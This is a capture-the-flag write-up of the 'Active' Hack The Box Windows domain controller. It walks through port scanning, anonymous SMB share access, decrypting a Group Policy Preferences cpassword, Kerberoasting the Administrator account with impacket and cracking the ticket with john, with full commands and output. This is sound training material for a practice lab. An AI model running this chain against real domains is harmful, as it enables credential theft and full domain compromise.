Active
Easy Windows Active Directory HTB box
Reconnaissance
As always we start off by performing a port scan with the tool Nmap
nmap -p- --open -Pn -n --min-rate5000 -sS -sCV 10.10.10.100 -oN scan # Nmap 7.95 scan initiated Wed Jul 30 13:54:34 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.044s latency).
Not shown: 64888 closed tcp ports (reset), 625 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-30 12:54:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
49176/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -1s
| smb2-time:
| date: 2025-07-30T12:55:48
|_ start_date: 2025-07-30T12:51:56
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 30 13:55:57 2025 -- 1 IP address (1 host up) scanned in 83.42 secondsWe see that the IP Points out to the domain active.htb so we add it into our /etc/hosts file
The SMB Service running on port 445 gives us a hint that we're facing a DC (Domain Controller) so let's enumerate it using smbmap
smbmap -H 10.10.10.100
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections We can see we have READ ACCESS to the /Replication share so let's see what's inside using smbclient
smbclient -N //10.10.10.100/ReplicationAfter enumerating for a bit, under the following directory:\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ We find the file: Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>Hash Cracking
We found a Username: SVC_TGS with a hashes password that we can crack using gpp-decrypt
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18And we got the password! --> GPPstillStandingStrong2k18
Let's try and enumerate the SMB Shares that this user has access to using SMBMap
smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections
We see we have now access to three more shares: NETLOGON | SYSVOL | Users so let's start off by enumerating the Users share, where we can find the user.txt
After this we proceed to enumerate the RPC service using rpcclient
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]
rpcclient $>Kerberoasting
We see the Administrator account so if this account has an SPN (Service Principal Name) tied to it, we might be able to Kerberoast it.
Kerberoasting is a technique where we request a Kerberos service ticket (TGS) for an account with an SPN. The ticket comes back encrypted with the account’s NTLM hash so we can crack it offline
Let's try and perform this attack using impacket-GetUserSPNs
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2025-07-30 13:53:33.360639
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cb55d65694803a7c18c5d2a016407522$e10b576d9e01c51c9da067228dcc3d0c85bc1bcc4bf187b14a1496b8b76ebfbb79fe2207365b3646cba2cc84c6413cb78491ae8f61aafc4deeb2c62b868930c497d625fce6811eb44b989e485f54cd96b3b06b0fb248f1a7ad14bae1c27e7f4e2df788b55dc54caafc06db8401301b3a356ab2d727d0a6a3389862b897a98301fe74a8427298d6be338d3234d76584b9ee58c51ecc5380bf917a8bd56732bc08ca3787dee431d0937f586d6493b74729e9002461d43bdafc029ef55510a9a3c70ef9d9e5e44654e3e5c27c766fa3f41e392c33d5946b81d36dbe02a482e17f08cdc8c011815230ced9db79f1026626ebf1ac89c44be883c135ea534c6f99d97e62ac06d5be7f970990430e4c2e934b0ccbcf58737f9d8d749cb84c6ac9441119d65bcfba4621f958857412cb305e0e346d55836892dcd0f9584e97275b57afcf07e5091687dd575fced50ec04ae888d008662ac68aefd8cf2edeb7f78322819971d52886077988570cfa22cd97df31d5141825b9c5c4cbcdfb7fd19291cbade6849dc5767726d560ebeb88376e8a7af8d1103e1c58261f766a3b3d8f1f0f67950a98ff3ba4b0d7f5ca056f10256b374eb27a41937b658acb8c3fdce318bbd868e1856c998706098670e3d2a352234188a5de0d48da1699ad5559b20d0c8e1acd1b6f9465826ab9a6f63321816dcdcd8227de00d6ffa711ef3c01ed1aa813cf0c80c80147071331f88845fbbb3a67f32f3d8e3410580f1fb4cd2e97a3e4feddf99b728b8f80b7baf10cbb17ddd8b980531d305b05d06338c4aa3d1632615b4bb04250622db58d9e62c0cb215d6e63888f2e0135ff4ab0d91eb46519ac24ba8291abba09b392aaa849424e95f8fa78a4a4c22fa7c6a69658f99e0fcd87a4486496d587649520d5dbead6b4cb5b705ebc7ef95d4ac19d1ff6bb3839693462d4c815d75daf9b71b6cf288538c41ee5f2086975be353870cee301d7f77f2aa8f0212d696284ac15daaadaa5018abdafa46d5586380aff7c8c7e5696458b0f32d1db000e27c44ffd5c21b06116b74a6affc3d99da2a2b8cacfaa5428332943a4d0424370adc6837368c8cbf2b6ef2d6f7fcc0017d6dfc52b84a9600507d3c9fd2566ec951b49443abdd4b0eaf5e75f9183cd9cc3382846632da3d6ecc498f97305a7be1d2c6cd3007639a81c957ec536c431617efeddc5bb3e7cca232b673916b540ca78da5cd9a3c0821ac4927c98910278ce0ec2abbb3e9a08f21782We successfully dumped the hash! let's try and crack it using john
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2025-07-30 15:54) 0.3225g/s 3400Kp/s 3400Kc/s 3400KC/s Tiffani143..Tekabunare
Use the "--show" option to display all of the cracked passwords reliably
Session completed. We successfully cracked the Administrator's password — Ticketmaster1968
Let's login via SMB to see the root.txt flag
smbclient -U Administrator //10.10.10.100/Users
------- SNIP --------
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 16:49:47 2021
.. DR 0 Thu Jan 21 16:49:47 2021
desktop.ini AHS 282 Mon Jul 30 14:50:10 2018
root.txt AR 34 Wed Jul 30 13:53:29 2025
5217023 blocks of size 4096. 279034 blocks available
smb: \Administrator\Desktop\> get root.txtHope you liked this Write-Up and see you next time!!
Last updated